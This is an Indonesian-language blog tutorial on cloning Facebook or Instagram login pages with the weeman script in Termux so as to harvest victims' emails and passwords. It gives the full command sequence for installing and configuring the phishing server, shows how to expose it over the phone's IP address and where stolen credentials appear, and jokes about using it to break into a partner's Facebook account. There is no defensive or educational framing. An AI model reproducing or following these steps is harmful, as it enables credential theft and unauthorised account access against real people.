Cara membuat web Phising menggunakan termux

BY:PAPAHNYA HIMAWARI

  web Phising menggunakan termux

 yang belum mengenal termux bisa mempelajari cara menggunakan termux. Untuk yang belum memiliki aplikasi termux nya bisa DOWNLOAD DISINI. Dan jangan lupa juga untuk download termux API. (DOWNLOAD DISINI). Selanjutnya kamu hanya harus menjalankan beberapa perintah untuk mengoperasikan web Phising nya.
Script termux yang akan digunakan untuk membuat web Phising adalah weeman. Dengan Script weeman kita bisa mengkloning semua website untuk dijadikan umpan. Misalkan kita ingin membuat web Phising facebook. Maka kita hanya perlu men setting alamat nya di weeman.
Jadi secara singkat cara membuat web Phising menggunakan termux hanya perlu mendownload aplikasi termux, mengclone Script weeman dari github lalu mengoperasikan nya. Sangat mudah bukan, ingin mencoba nya? Pahami penjelasan berikut.

Cara membuat web Phising dengan Script weeman


Hal yang pertama dilakukan adalah buka aplikasi termux kamu. Ketikan perintah:
  • apt update && apt upgrade (enter)
  • pkg install git (enter)
  • pkg install python2 (enter)
  • git clone https://github.com/evait-security/weeman.git (enter)
  • cd weeman (enter)
  • chmod +x weeman.py (enter)
  • python2 weeman.py (enter)
Tunggu sampai proses install Script weeman nya selesai. Jika Script nya sudah terinstall maka tampilan nya akan seperti gambar di bawah ini.
Tampilan weeman yang sudah terinstall di termux
Selanjutnya kamu tinggal mensetting web Phising nya. Misal ingin membuat web Phising facebook. Maka tulis alamat Facebook. Jika ingin membuat web Phising instagram maka tinggal tulis alamat instagram. Untuk lebih jelas, saya akan contohkan membuat web Phising facebook. Masukan perintah berikut :
  • set url https://facebook.com (enter)
  • set port 8080 (enter)
  • set action_url https://facebook.com (enter)
  • run (enter)
Tunggu proses nya selesai. Lalu copy alamat web Phising kamu dan paste kan di google. Untuk alamat Phising nya seperti pada gambar yang saya block.
Alamat web Phising yang sudah jadi
Agar hasil Phising nya masuk ke server kamu. Usap dari kiri ke kanan pada layar termux lalu pilih new season. Lalu masukan perintah ” ifconfig ” . Dan cari IP kamu dengan tanda ” inet addr (no ip) “. Copy IP kamu lalu paste kan sebelum :8080 . Maka alamat Phising yang tadinya localhost:8080 akan berubah menjadi no ip kamu:8080 . Jika bingung lihat gambar.
Nomer IP kamu

Alamat web Phising kamu (noIP:8080)

Selesai!! Kamu tinggal menunggu korban masuk. Hehe
Catatan:
Termux kamu harus tetap aktif. Jangan sampai diclose. Biarkan saja berjalan dilatar belakang. Jika termux kamu diclose, maka saat ada korban masuk kamu tidak akan mendapatkan data nya. Jadi kesimpulannya jika ingin memasang link Phising kamu, termux kamu harus tetap aktif dan menjadi Script weeman.

Dimana saya mengecek jika ada korban yang masuk ke web Phising saya?

Kamu cukup geser kebawah pada termux yang sedang menjalankan weeman. maka kamu akan menemui data dari korban. Yaitu email dan kata sandi nya. Sebagai contoh lihat gambar.

Email dan kata sandi yang masuk ke web phising
Lumayan kan buat dapetin akun FB pacar. Jadi bisa tau tanpa meminta password nya.

Kesimpulan


Mudah sekali bukan Membuat web Phising hanya bermodalkan Script termux. Berikut daftar Script termux lainya, yang mungkin bermanfaat bagi kamu:

Komentar